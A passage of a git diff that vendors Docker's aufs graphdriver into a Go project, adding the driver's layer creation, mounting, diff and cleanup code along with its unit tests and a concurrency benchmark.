strings.Contains(s.Text(), "aufs") { + return nil + } + } + return ErrAufsNotSupported +} + +func (a *Driver) rootPath() string { + return a.root +} + +func (*Driver) String() string { + return "aufs" +} + +// Status returns current information about the filesystem such as root directory, number of directories mounted, etc. +func (a *Driver) Status() [][2]string { + ids, _ := loadIds(path.Join(a.rootPath(), "layers")) + return [][2]string{ + {"Root Dir", a.rootPath()}, + {"Backing Filesystem", backingFs}, + {"Dirs", fmt.Sprintf("%d", len(ids))}, + {"Dirperm1 Supported", fmt.Sprintf("%v", useDirperm())}, + } +} + +// GetMetadata not implemented +func (a *Driver) GetMetadata(id string) (map[string]string, error) { + return nil, nil +} + +// Exists returns true if the given id is registered with +// this driver +func (a *Driver) Exists(id string) bool { + if _, err := os.Lstat(path.Join(a.rootPath(), "layers", id)); err != nil { + return false + } + return true +} + +// CreateReadWrite creates a layer that is writable for use as a container +// file system. +func (a *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { + return a.Create(id, parent, opts) +} + +// Create three folders for each id +// mnt, layers, and diff +func (a *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { + + if opts != nil && len(opts.StorageOpt) != 0 { + return fmt.Errorf("--storage-opt is not supported for aufs") + } + + if err := a.createDirsFor(id); err != nil { + return err + } + // Write the layers metadata + f, err := os.Create(path.Join(a.rootPath(), "layers", id)) + if err != nil { + return err + } + defer f.Close() + + if parent != "" { + ids, err := getParentIDs(a.rootPath(), parent) + if err != nil { + return err + } + + if _, err := fmt.Fprintln(f, parent); err != nil { + return err + } + for _, i := range ids { + if _, err := fmt.Fprintln(f, i); err != nil { + return err + } + } + } + + return nil +} + +// createDirsFor creates two directories for the given id. +// mnt and diff +func (a *Driver) createDirsFor(id string) error { + paths := []string{ + "mnt", + "diff", + } + + rootUID, rootGID, err := idtools.GetRootUIDGID(a.uidMaps, a.gidMaps) + if err != nil { + return err + } + // Directory permission is 0755. + // The path of directories are /mnt/ + // and /diff/ + for _, p := range paths { + if err := idtools.MkdirAllAs(path.Join(a.rootPath(), p, id), 0755, rootUID, rootGID); err != nil { + return err + } + } + return nil +} + +// Helper function to debug EBUSY errors on remove. +func debugEBusy(mountPath string) (out []string, err error) { + // lsof is not part of GNU coreutils. This is a best effort + // attempt to detect offending processes. + c := exec.Command("lsof") + + r, err := c.StdoutPipe() + if err != nil { + return nil, fmt.Errorf("Assigning pipes failed with %v", err) + } + + if err := c.Start(); err != nil { + return nil, fmt.Errorf("Starting %s failed with %v", c.Path, err) + } + + defer func() { + waiterr := c.Wait() + if waiterr != nil && err == nil { + err = fmt.Errorf("Waiting for %s failed with %v", c.Path, waiterr) + } + }() + + sc := bufio.NewScanner(r) + for sc.Scan() { + entry := sc.Text() + if strings.Contains(entry, mountPath) { + out = append(out, entry, "\n") + } + } + + return out, nil +} + +// Remove will unmount and remove the given id. +func (a *Driver) Remove(id string) error { + a.pathCacheLock.Lock() + mountpoint, exists := a.pathCache[id] + a.pathCacheLock.Unlock() + if !exists { + mountpoint = a.getMountpoint(id) + } + + var retries int + for { + mounted, err := a.mounted(mountpoint) + if err != nil { + return err + } + if !mounted { + break + } + + if err := a.unmount(mountpoint); err != nil { + if err != syscall.EBUSY { + return fmt.Errorf("aufs: unmount error: %s: %v", mountpoint, err) + } + if retries >= 5 { + out, debugErr := debugEBusy(mountpoint) + if debugErr == nil { + logrus.Warnf("debugEBusy returned %v", out) + } + return fmt.Errorf("aufs: unmount error after retries: %s: %v", mountpoint, err) + } + // If unmount returns EBUSY, it could be a transient error. Sleep and retry. + retries++ + logrus.Warnf("unmount failed due to EBUSY: retry count: %d", retries) + time.Sleep(100 * time.Millisecond) + continue + } + break + } + + // Atomically remove each directory in turn by first moving it out of the + // way (so that docker doesn't find it anymore) before doing removal of + // the whole tree. + tmpMntPath := path.Join(a.mntPath(), fmt.Sprintf("%s-removing", id)) + if err := os.Rename(mountpoint, tmpMntPath); err != nil && !os.IsNotExist(err) { + if err == syscall.EBUSY { + logrus.Warn("os.Rename err due to EBUSY") + out, debugErr := debugEBusy(mountpoint) + if debugErr == nil { + logrus.Warnf("debugEBusy returned %v", out) + } + } + return err + } + defer os.RemoveAll(tmpMntPath) + + tmpDiffpath := path.Join(a.diffPath(), fmt.Sprintf("%s-removing", id)) + if err := os.Rename(a.getDiffPath(id), tmpDiffpath); err != nil && !os.IsNotExist(err) { + return err + } + defer os.RemoveAll(tmpDiffpath) + + // Remove the layers file for the id + if err := os.Remove(path.Join(a.rootPath(), "layers", id)); err != nil && !os.IsNotExist(err) { + return err + } + + a.pathCacheLock.Lock() + delete(a.pathCache, id) + a.pathCacheLock.Unlock() + return nil +} + +// Get returns the rootfs path for the id. +// This will mount the dir at its given path +func (a *Driver) Get(id, mountLabel string) (string, error) { + parents, err := a.getParentLayerPaths(id) + if err != nil && !os.IsNotExist(err) { + return "", err + } + + a.pathCacheLock.Lock() + m, exists := a.pathCache[id] + a.pathCacheLock.Unlock() + + if !exists { + m = a.getDiffPath(id) + if len(parents) > 0 { + m = a.getMountpoint(id) + } + } + if count := a.ctr.Increment(m); count > 1 { + return m, nil + } + + // If a dir does not have a parent ( no layers )do not try to mount + // just return the diff path to the data + if len(parents) > 0 { + if err := a.mount(id, m, mountLabel, parents); err != nil { + return "", err + } + } + + a.pathCacheLock.Lock() + a.pathCache[id] = m + a.pathCacheLock.Unlock() + return m, nil +} + +// Put unmounts and updates list of active mounts. +func (a *Driver) Put(id string) error { + a.pathCacheLock.Lock() + m, exists := a.pathCache[id] + if !exists { + m = a.getMountpoint(id) + a.pathCache[id] = m + } + a.pathCacheLock.Unlock() + if count := a.ctr.Decrement(m); count > 0 { + return nil + } + + err := a.unmount(m) + if err != nil { + logrus.Debugf("Failed to unmount %s aufs: %v", id, err) + } + return err +} + +// isParent returns if the passed in parent is the direct parent of the passed in layer +func (a *Driver) isParent(id, parent string) bool { + parents, _ := getParentIDs(a.rootPath(), id) + if parent == "" && len(parents) > 0 { + return false + } + return !(len(parents) > 0 && parent != parents[0]) +} + +// Diff produces an archive of the changes between the specified +// layer and its parent layer which may be "". +func (a *Driver) Diff(id, parent string) (io.ReadCloser, error) { + if !a.isParent(id, parent) { + return a.naiveDiff.Diff(id, parent) + } + + // AUFS doesn't need the parent layer to produce a diff. + return archive.TarWithOptions(path.Join(a.rootPath(), "diff", id), &archive.TarOptions{ + Compression: archive.Uncompressed, + ExcludePatterns: []string{archive.WhiteoutMetaPrefix + "*", "!" + archive.WhiteoutOpaqueDir}, + UIDMaps: a.uidMaps, + GIDMaps: a.gidMaps, + }) +} + +type fileGetNilCloser struct { + storage.FileGetter +} + +func (f fileGetNilCloser) Close() error { + return nil +} + +// DiffGetter returns a FileGetCloser that can read files from the directory that +// contains files for the layer differences. Used for direct access for tar-split. +func (a *Driver) DiffGetter(id string) (graphdriver.FileGetCloser, error) { + p := path.Join(a.rootPath(), "diff", id) + return fileGetNilCloser{storage.NewPathFileGetter(p)}, nil +} + +func (a *Driver) applyDiff(id string, diff io.Reader) error { + return chrootarchive.UntarUncompressed(diff, path.Join(a.rootPath(), "diff", id), &archive.TarOptions{ + UIDMaps: a.uidMaps, + GIDMaps: a.gidMaps, + }) +} + +// DiffSize calculates the changes between the specified id +// and its parent and returns the size in bytes of the changes +// relative to its base filesystem directory. +func (a *Driver) DiffSize(id, parent string) (size int64, err error) { + if !a.isParent(id, parent) { + return a.naiveDiff.DiffSize(id, parent) + } + // AUFS doesn't need the parent layer to calculate the diff size. + return directory.Size(path.Join(a.rootPath(), "diff", id)) +} + +// ApplyDiff extracts the changeset from the given diff into the +// layer with the specified id and parent, returning the size of the +// new layer in bytes. +func (a *Driver) ApplyDiff(id, parent string, diff io.Reader) (size int64, err error) { + if !a.isParent(id, parent) { + return a.naiveDiff.ApplyDiff(id, parent, diff) + } + + // AUFS doesn't need the parent id to apply the diff if it is the direct parent. + if err = a.applyDiff(id, diff); err != nil { + return + } + + return a.DiffSize(id, parent) +} + +// Changes produces a list of changes between the specified layer +// and its parent layer. If parent is "", then all changes will be ADD changes. +func (a *Driver) Changes(id, parent string) ([]archive.Change, error) { + if !a.isParent(id, parent) { + return a.naiveDiff.Changes(id, parent) + } + + // AUFS doesn't have snapshots, so we need to get changes from all parent + // layers. + layers, err := a.getParentLayerPaths(id) + if err != nil { + return nil, err + } + return archive.Changes(layers, path.Join(a.rootPath(), "diff", id)) +} + +func (a *Driver) getParentLayerPaths(id string) ([]string, error) { + parentIds, err := getParentIDs(a.rootPath(), id) + if err != nil { + return nil, err + } + layers := make([]string, len(parentIds)) + + // Get the diff paths for all the parent ids + for i, p := range parentIds { + layers[i] = path.Join(a.rootPath(), "diff", p) + } + return layers, nil +} + +func (a *Driver) mount(id string, target string, mountLabel string, layers []string) error { + a.Lock() + defer a.Unlock() + + // If the id is mounted or we get an error return + if mounted, err := a.mounted(target); err != nil || mounted { + return err + } + + rw := a.getDiffPath(id) + + if err := a.aufsMount(layers, rw, target, mountLabel); err != nil { + return fmt.Errorf("error creating aufs mount to %s: %v", target, err) + } + return nil +} + +func (a *Driver) unmount(mountPath string) error { + a.Lock() + defer a.Unlock() + + if mounted, err := a.mounted(mountPath); err != nil || !mounted { + return err + } + if err := Unmount(mountPath); err != nil { + return err + } + return nil +} + +func (a *Driver) mounted(mountpoint string) (bool, error) { + return graphdriver.Mounted(graphdriver.FsMagicAufs, mountpoint) +} + +// Cleanup aufs and unmount all mountpoints +func (a *Driver) Cleanup() error { + var dirs []string + if err := filepath.Walk(a.mntPath(), func(path string, info os.FileInfo, err error) error { + if err != nil { + return err + } + if !info.IsDir() { + return nil + } + dirs = append(dirs, path) + return nil + }); err != nil { + return err + } + + for _, m := range dirs { + if err := a.unmount(m); err != nil { + logrus.Debugf("aufs error unmounting %s: %s", m, err) + } + } + return mountpk.Unmount(a.root) +} + +func (a *Driver) aufsMount(ro []string, rw, target, mountLabel string) (err error) { + defer func() { + if err != nil { + Unmount(target) + } + }() + + // Mount options are clipped to page size(4096 bytes). If there are more + // layers then these are remounted individually using append. + + offset := 54 + if useDirperm() { + offset += len("dirperm1") + } + b := make([]byte, syscall.Getpagesize()-len(mountLabel)-offset) // room for xino & mountLabel + bp := copy(b, fmt.Sprintf("br:%s=rw", rw)) + + index := 0 + for ; index < len(ro); index++ { + layer := fmt.Sprintf(":%s=ro+wh", ro[index]) + if bp+len(layer) > len(b) { + break + } + bp += copy(b[bp:], layer) + } + + opts := "dio,xino=/dev/shm/aufs.xino" + if useDirperm() { + opts += ",dirperm1" + } + data := label.FormatMountLabel(fmt.Sprintf("%s,%s", string(b[:bp]), opts), mountLabel) + if err = mount("none", target, "aufs", 0, data); err != nil { + return + } + + for ; index < len(ro); index++ { + layer := fmt.Sprintf(":%s=ro+wh", ro[index]) + data := label.FormatMountLabel(fmt.Sprintf("append%s", layer), mountLabel) + if err = mount("none", target, "aufs", syscall.MS_REMOUNT, data); err != nil { + return + } + } + + return +} + +// useDirperm checks dirperm1 mount option can be used with the current +// version of aufs. +func useDirperm() bool { + enableDirpermLock.Do(func() { + base, err := ioutil.TempDir("", "docker-aufs-base") + if err != nil { + logrus.Errorf("error checking dirperm1: %v", err) + return + } + defer os.RemoveAll(base) + + union, err := ioutil.TempDir("", "docker-aufs-union") + if err != nil { + logrus.Errorf("error checking dirperm1: %v", err) + return + } + defer os.RemoveAll(union) + + opts := fmt.Sprintf("br:%s,dirperm1,xino=/dev/shm/aufs.xino", base) + if err := mount("none", union, "aufs", 0, opts); err != nil { + return + } + enableDirperm = true + if err := Unmount(union); err != nil { + logrus.Errorf("error checking dirperm1: failed to unmount %v", err) + } + }) + return enableDirperm +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go new file mode 100644 index 0000000000..dc3c6a392b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go @@ -0,0 +1,802 @@ +// +build linux + +package aufs + +import ( + "crypto/sha256" + "encoding/hex" + "fmt" + "io/ioutil" + "os" + "path" + "sync" + "testing" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/reexec" + "github.com/docker/docker/pkg/stringid" +) + +var ( + tmpOuter = path.Join(os.TempDir(), "aufs-tests") + tmp = path.Join(tmpOuter, "aufs") +) + +func init() { + reexec.Init() +} + +func testInit(dir string, t testing.TB) graphdriver.Driver { + d, err := Init(dir, nil, nil, nil) + if err != nil { + if err == graphdriver.ErrNotSupported { + t.Skip(err) + } else { + t.Fatal(err) + } + } + return d +} + +func newDriver(t testing.TB) *Driver { + if err := os.MkdirAll(tmp, 0755); err != nil { + t.Fatal(err) + } + + d := testInit(tmp, t) + return d.(*Driver) +} + +func TestNewDriver(t *testing.T) { + if err := os.MkdirAll(tmp, 0755); err != nil { + t.Fatal(err) + } + + d := testInit(tmp, t) + defer os.RemoveAll(tmp) + if d == nil { + t.Fatalf("Driver should not be nil") + } +} + +func TestAufsString(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if d.String() != "aufs" { + t.Fatalf("Expected aufs got %s", d.String()) + } +} + +func TestCreateDirStructure(t *testing.T) { + newDriver(t) + defer os.RemoveAll(tmp) + + paths := []string{ + "mnt", + "layers", + "diff", + } + + for _, p := range paths { + if _, err := os.Stat(path.Join(tmp, p)); err != nil { + t.Fatal(err) + } + } +} + +// We should be able to create two drivers with the same dir structure +func TestNewDriverFromExistingDir(t *testing.T) { + if err := os.MkdirAll(tmp, 0755); err != nil { + t.Fatal(err) + } + + testInit(tmp, t) + testInit(tmp, t) + os.RemoveAll(tmp) +} + +func TestCreateNewDir(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } +} + +func TestCreateNewDirStructure(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } + + paths := []string{ + "mnt", + "diff", + "layers", + } + + for _, p := range paths { + if _, err := os.Stat(path.Join(tmp, p, "1")); err != nil { + t.Fatal(err) + } + } +} + +func TestRemoveImage(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } + + if err := d.Remove("1"); err != nil { + t.Fatal(err) + } + + paths := []string{ + "mnt", + "diff", + "layers", + } + + for _, p := range paths { + if _, err := os.Stat(path.Join(tmp, p, "1")); err == nil { + t.Fatalf("Error should not be nil because dirs with id 1 should be delted: %s", p) + } + } +} + +func TestGetWithoutParent(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } + + diffPath, err := d.Get("1", "") + if err != nil { + t.Fatal(err) + } + expected := path.Join(tmp, "diff", "1") + if diffPath != expected { + t.Fatalf("Expected path %s got %s", expected, diffPath) + } +} + +func TestCleanupWithNoDirs(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.Cleanup(); err != nil { + t.Fatal(err) + } +} + +func TestCleanupWithDir(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } + + if err := d.Cleanup(); err != nil { + t.Fatal(err) + } +} + +func TestMountedFalseResponse(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } + + response, err := d.mounted(d.getDiffPath("1")) + if err != nil { + t.Fatal(err) + } + + if response != false { + t.Fatalf("Response if dir id 1 is mounted should be false") + } +} + +func TestMountedTrueReponse(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + defer d.Cleanup() + + if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } + if err := d.Create("2", "1", nil); err != nil { + t.Fatal(err) + } + + _, err := d.Get("2", "") + if err != nil { + t.Fatal(err) + } + + response, err := d.mounted(d.pathCache["2"]) + if err != nil { + t.Fatal(err) + } + + if response != true { + t.Fatalf("Response if dir id 2 is mounted should be true") + } +} + +func TestMountWithParent(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } + if err := d.Create("2", "1", nil); err != nil { + t.Fatal(err) + } + + defer func() { + if err := d.Cleanup(); err != nil { + t.Fatal(err) + } + }() + + mntPath, err := d.Get("2", "") + if err != nil { + t.Fatal(err) + } + if mntPath == "" { + t.Fatal("mntPath should not be empty string") + } + + expected := path.Join(tmp, "mnt", "2") + if mntPath != expected { + t.Fatalf("Expected %s got %s", expected, mntPath) + } +} + +func TestRemoveMountedDir(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } + if err := d.Create("2", "1", nil); err != nil { + t.Fatal(err) + } + + defer func() { + if err := d.Cleanup(); err != nil { + t.Fatal(err) + } + }() + + mntPath, err := d.Get("2", "") + if err != nil { + t.Fatal(err) + } + if mntPath == "" { + t.Fatal("mntPath should not be empty string") + } + + mounted, err := d.mounted(d.pathCache["2"]) + if err != nil { + t.Fatal(err) + } + + if !mounted { + t.Fatalf("Dir id 2 should be mounted") + } + + if err := d.Remove("2"); err != nil { + t.Fatal(err) + } +} + +func TestCreateWithInvalidParent(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.Create("1", "docker", nil); err == nil { + t.Fatalf("Error should not be nil with parent does not exist") + } +} + +func TestGetDiff(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.CreateReadWrite("1", "", nil); err != nil { + t.Fatal(err) + } + + diffPath, err := d.Get("1", "") + if err != nil { + t.Fatal(err) + } + + // Add a file to the diff path with a fixed size + size := int64(1024) + + f, err := os.Create(path.Join(diffPath, "test_file")) + if err != nil { + t.Fatal(err) + } + if err := f.Truncate(size); err != nil { + t.Fatal(err) + } + f.Close() + + a, err := d.Diff("1", "") + if err != nil { + t.Fatal(err) + } + if a == nil { + t.Fatalf("Archive should not be nil") + } +} + +func TestChanges(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } + + if err := d.CreateReadWrite("2", "1", nil); err != nil { + t.Fatal(err) + } + + defer func() { + if err := d.Cleanup(); err != nil { + t.Fatal(err) + } + }() + + mntPoint, err := d.Get("2", "") + if err != nil { + t.Fatal(err) + } + + // Create a file to save in the mountpoint + f, err := os.Create(path.Join(mntPoint, "test.txt")) + if err != nil { + t.Fatal(err) + } + + if _, err := f.WriteString("testline"); err != nil { + t.Fatal(err) + } + if err := f.Close(); err != nil { + t.Fatal(err) + } + + changes, err := d.Changes("2", "") + if err != nil { + t.Fatal(err) + } + if len(changes) != 1 { + t.Fatalf("Dir 2 should have one change from parent got %d", len(changes)) + } + change := changes[0] + + expectedPath := "/test.txt" + if change.Path != expectedPath { + t.Fatalf("Expected path %s got %s", expectedPath, change.Path) + } + + if change.Kind != archive.ChangeAdd { + t.Fatalf("Change kind should be ChangeAdd got %s", change.Kind) + } + + if err := d.CreateReadWrite("3", "2", nil); err != nil { + t.Fatal(err) + } + mntPoint, err = d.Get("3", "") + if err != nil { + t.Fatal(err) + } + + // Create a file to save in the mountpoint + f, err = os.Create(path.Join(mntPoint, "test2.txt")) + if err != nil { + t.Fatal(err) + } + + if _, err := f.WriteString("testline"); err != nil { + t.Fatal(err) + } + if err := f.Close(); err != nil { + t.Fatal(err) + } + + changes, err = d.Changes("3", "2") + if err != nil { + t.Fatal(err) + } + + if len(changes) != 1 { + t.Fatalf("Dir 2 should have one change from parent got %d", len(changes)) + } + change = changes[0] + + expectedPath = "/test2.txt" + if change.Path != expectedPath { + t.Fatalf("Expected path %s got %s", expectedPath, change.Path) + } + + if change.Kind != archive.ChangeAdd { + t.Fatalf("Change kind should be ChangeAdd got %s", change.Kind) + } +} + +func TestDiffSize(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.CreateReadWrite("1", "", nil); err != nil { + t.Fatal(err) + } + + diffPath, err := d.Get("1", "") + if err != nil { + t.Fatal(err) + } + + // Add a file to the diff path with a fixed size + size := int64(1024) + + f, err := os.Create(path.Join(diffPath, "test_file")) + if err != nil { + t.Fatal(err) + } + if err := f.Truncate(size); err != nil { + t.Fatal(err) + } + s, err := f.Stat() + if err != nil { + t.Fatal(err) + } + size = s.Size() + if err := f.Close(); err != nil { + t.Fatal(err) + } + + diffSize, err := d.DiffSize("1", "") + if err != nil { + t.Fatal(err) + } + if diffSize != size { + t.Fatalf("Expected size to be %d got %d", size, diffSize) + } +} + +func TestChildDiffSize(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + defer d.Cleanup() + + if err := d.CreateReadWrite("1", "", nil); err != nil { + t.Fatal(err) + } + + diffPath, err := d.Get("1", "") + if err != nil { + t.Fatal(err) + } + + // Add a file to the diff path with a fixed size + size := int64(1024) + + f, err := os.Create(path.Join(diffPath, "test_file")) + if err != nil { + t.Fatal(err) + } + if err := f.Truncate(size); err != nil { + t.Fatal(err) + } + s, err := f.Stat() + if err != nil { + t.Fatal(err) + } + size = s.Size() + if err := f.Close(); err != nil { + t.Fatal(err) + } + + diffSize, err := d.DiffSize("1", "") + if err != nil { + t.Fatal(err) + } + if diffSize != size { + t.Fatalf("Expected size to be %d got %d", size, diffSize) + } + + if err := d.Create("2", "1", nil); err != nil { + t.Fatal(err) + } + + diffSize, err = d.DiffSize("2", "1") + if err != nil { + t.Fatal(err) + } + // The diff size for the child should be zero + if diffSize != 0 { + t.Fatalf("Expected size to be %d got %d", 0, diffSize) + } +} + +func TestExists(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + defer d.Cleanup() + + if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } + + if d.Exists("none") { + t.Fatal("id none should not exist in the driver") + } + + if !d.Exists("1") { + t.Fatal("id 1 should exist in the driver") + } +} + +func TestStatus(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + defer d.Cleanup() + + if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } + + status := d.Status() + if status == nil || len(status) == 0 { + t.Fatal("Status should not be nil or empty") + } + rootDir := status[0] + dirs := status[2] + if rootDir[0] != "Root Dir" { + t.Fatalf("Expected Root Dir got %s", rootDir[0]) + } + if rootDir[1] != d.rootPath() { + t.Fatalf("Expected %s got %s", d.rootPath(), rootDir[1]) + } + if dirs[0] != "Dirs" { + t.Fatalf("Expected Dirs got %s", dirs[0]) + } + if dirs[1] != "1" { + t.Fatalf("Expected 1 got %s", dirs[1]) + } +} + +func TestApplyDiff(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + defer d.Cleanup() + + if err := d.CreateReadWrite("1", "", nil); err != nil { + t.Fatal(err) + } + + diffPath, err := d.Get("1", "") + if err != nil { + t.Fatal(err) + } + + // Add a file to the diff path with a fixed size + size := int64(1024) + + f, err := os.Create(path.Join(diffPath, "test_file")) + if err != nil { + t.Fatal(err) + } + if err := f.Truncate(size); err != nil { + t.Fatal(err) + } + f.Close() + + diff, err := d.Diff("1", "") + if err != nil { + t.Fatal(err) + } + + if err := d.Create("2", "", nil); err != nil { + t.Fatal(err) + } + if err := d.Create("3", "2", nil); err != nil { + t.Fatal(err) + } + + if err := d.applyDiff("3", diff); err != nil { + t.Fatal(err) + } + + // Ensure that the file is in the mount point for id 3 + + mountPoint, err := d.Get("3", "") + if err != nil { + t.Fatal(err) + } + if _, err := os.Stat(path.Join(mountPoint, "test_file")); err != nil { + t.Fatal(err) + } +} + +func hash(c string) string { + h := sha256.New() + fmt.Fprint(h, c) + return hex.EncodeToString(h.Sum(nil)) +} + +func testMountMoreThan42Layers(t *testing.T, mountPath string) { + if err := os.MkdirAll(mountPath, 0755); err != nil { + t.Fatal(err) + } + + defer os.RemoveAll(mountPath) + d := testInit(mountPath, t).(*Driver) + defer d.Cleanup() + var last string + var expected int + + for i := 1; i < 127; i++ { + expected++ + var ( + parent = fmt.Sprintf("%d", i-1) + current = fmt.Sprintf("%d", i) + ) + + if parent == "0" { + parent = "" + } else { + parent = hash(parent) + } + current = hash(current) + + if err := d.CreateReadWrite(current, parent, nil); err != nil { + t.Logf("Current layer %d", i) + t.Error(err) + } + point, err := d.Get(current, "") + if err != nil { + t.Logf("Current layer %d", i) + t.Error(err) + } + f, err := os.Create(path.Join(point, current)) + if err != nil { + t.Logf("Current layer %d", i) + t.Error(err) + } + f.Close() + + if i%10 == 0 { + if err := os.Remove(path.Join(point, parent)); err != nil { + t.Logf("Current layer %d", i) + t.Error(err) + } + expected-- + } + last = current + } + + // Perform the actual mount for the top most image + point, err := d.Get(last, "") + if err != nil { + t.Error(err) + } + files, err := ioutil.ReadDir(point) + if err != nil { + t.Error(err) + } + if len(files) != expected { + t.Errorf("Expected %d got %d", expected, len(files)) + } +} + +func TestMountMoreThan42Layers(t *testing.T) { + os.RemoveAll(tmpOuter) + testMountMoreThan42Layers(t, tmp) +} + +func TestMountMoreThan42LayersMatchingPathLength(t *testing.T) { + defer os.RemoveAll(tmpOuter) + zeroes := "0" + for { + // This finds a mount path so that when combined into aufs mount options + // 4096 byte boundary would be in between the paths or in permission + // section. For '/tmp' it will use '/tmp/aufs-tests/00000000/aufs' + mountPath := path.Join(tmpOuter, zeroes, "aufs") + pathLength := 77 + len(mountPath) + + if mod := 4095 % pathLength; mod == 0 || mod > pathLength-2 { + t.Logf("Using path: %s", mountPath) + testMountMoreThan42Layers(t, mountPath) + return + } + zeroes += "0" + } +} + +func BenchmarkConcurrentAccess(b *testing.B) { + b.StopTimer() + b.ResetTimer() + + d := newDriver(b) + defer os.RemoveAll(tmp) + defer d.Cleanup() + + numConcurent := 256 + // create a bunch of ids + var ids []string + for i := 0; i < numConcurent; i++ { + ids = append(ids, stringid.GenerateNonCryptoID()) + } + + if err := d.Create(ids[0], "", nil); err != nil { + b.Fatal(err) + } + + if err := d.Create(ids[1], ids[0], nil); err != nil { + b.Fatal(err) + } + + parent := ids[1] + ids = append(ids[2:]) + + chErr := make(chan error, numConcurent) + var outerGroup sync.WaitGroup + outerGroup.Add(len(ids)) + b.StartTimer() + + // here's the actual bench + for _, id := range ids { + go func(id string) { + defer outerGroup.Done() + if err := d.Create(id, parent, nil); err != nil { + b.Logf("Create %s failed", id) + chErr <- err + return + } + var innerGroup sync.WaitGroup + for i := 0; i < b.N; i++ { + innerGroup.Add(1) + go func() { + d.Get(id, "") + d.Put(id) + innerGroup.Done() + }() + } + innerGroup.Wait() + d.Remove(id) + }(id) + } + + outerGroup.Wait() + b.StopTimer() + close(chErr) + for err := range chErr { + if err != nil { + b.Log(err) + b.Fail() + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go new file mode 100644 index 0000000000..d2325fc46c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go @@ -0,0 +1,64 @@ +// +build linux + +package aufs + +import ( + "bufio" + "io/ioutil" + "os" + "path" +) + +// Return all the directories +func loadIds(root string) ([]string, error) { + dirs, err := ioutil.ReadDir(root) + if err != nil { + return nil, err + } + out := []string{} + for _, d := range dirs { + if !d.IsDir() { + out = append(out, d.Name()) + } + } + return out, nil +} + +// Read the layers file for the current id and return all the +// layers represented by new lines in the file +// +// If there are no lines in the file then the id has no parent +// and an empty slice is returned. +func getParentIDs(root, id string) ([]string, error) { + f, err := os.Open(path.Join(root, "layers", id)) + if err != nil { + return nil, err + } + defer f.Close() + + out := []string{} + s := bufio.NewScanner(f) + + for s.Scan() { + if t := s.Text(); t != "" { + out = append(out, s.Text()) + } + } + return out, s.Err() +} + +func (a *Driver) getMountpoint(id string) string { + return path.Join(a.mntPath(), id) +} + +func (a *Driver) mntPath() string { + return path.Join(a.rootPath(), "mnt") +} + +func (a *Driver) getDiffPath(id string) string { + return path.Join(a.diffPath(), id) +} + +func (a *Driver) diffPath() string { + return path.Join(a.rootPath(), "diff") +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go new file mode 100644 index 0000000000..da1e892f44 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go @@ -0,0 +1,21 @@ +// +build linux + +package aufs + +import ( + "os/exec" + "syscall" + + "github.com/Sirupsen/logrus" +) + +// Unmount the target specified. +func Unmount(target string) error { + if err := exec.Command("auplink", target, "flush").Run(); err != nil { + logrus.Warnf("Couldn't run auplink before unmount %s: %s", target, err) + } + if err := syscall.Unmount(target, 0); err != nil { + return err + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go new file mode 100644 index 0000000000..8062bae420 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go @@ -0,0 +1,7 @@ +package aufs + +import "syscall" + +func mount(source string, target string, fstype string, flags uintptr, data string) error { + return syscall.Mount(source, target, fstype, flags, data) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go new file mode 100644 index 0000000000..d030b06637 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go @@ -0,0 +1,12 @@ +// +build !linux + +package aufs + +import "errors" 